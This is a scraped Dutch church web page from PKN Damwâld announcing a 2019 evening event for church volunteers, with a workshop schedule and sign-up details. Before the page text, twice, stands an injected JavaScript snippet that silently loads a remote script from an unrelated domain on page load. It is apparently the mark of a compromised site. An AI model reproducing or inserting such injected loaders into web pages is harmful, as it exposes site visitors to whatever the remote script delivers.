;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Inspiratiebeurs - PKN Damwâld
6 februari 2019
19:30 t/m 21:30
Inspiratiebeurs

Op woensdagavond 6 februari 2019 in de nieuwe Ferbiningstsjerke in Zwaagwesteinde.

We nodigen ambtsdragers en anderen die actief zijn in de kerkelijke gemeenten binnen werkgemeenschap de Wâlden (Dantumadeel + Twijzelerheide) van harte uit om elkaar te ontmoeten en geïnspireerd te worden voor ons werk binnen de kerk !

19.30 – 19.45 Gezamenlijke opening in de kerkzaal
19.45 – 20.30 Eerste Workshopronde
20.30 – 20.45 Pauze in de centrale hal
20.45 – 21.30 Tweede Workshopronde
Daarna, napraten met een drankje in de centrale hal.

De volgende workshops worden aangeboden:
1. Pastoraat,
1A “Basisvaardigheden bij gespreksvoering
1B “Op bezoek bij rouw en verdriet
door ds. Siep Boukes, Damwoude en ds. Gijsbert Otter, Damwoude
2. “Kerk zijn in het dorp, kansen en knelpunten” (Dorpskerkenbeweging)
naar aanleiding van het boek “Sporen van God” van Jacobine Gelderloos
door ds. Anne Elverdink, Feanwâlden
3. Jeugdwerk: “Visie ontwikkelen voor jongeren, kerk en geloven”
door jongerenwerker Robert Colijn, Damwoude
4. Diakenen, “Diaconaat in eigen dorp”
door ds. Wybren de Jong, Rinsumageest
5. Kerkrentmeesters, “Hoe om te gaan met de Privacywetgeving ?”
door ds. Bernard Terlouw, samen met Petra Hut, ouderling beleid, Zwaagwesteinde

Kom en laat je inspireren. We kunnen van elkaar nog zoveel leren !!
Opgave vóór 1 februari 2019 bij Leo Blees l.j.blees@knid.nl

Namens werkgemeenschap de Wâlden: Leo Blees, Robert Colijn, Anne Elverdink en Gijsbert Otter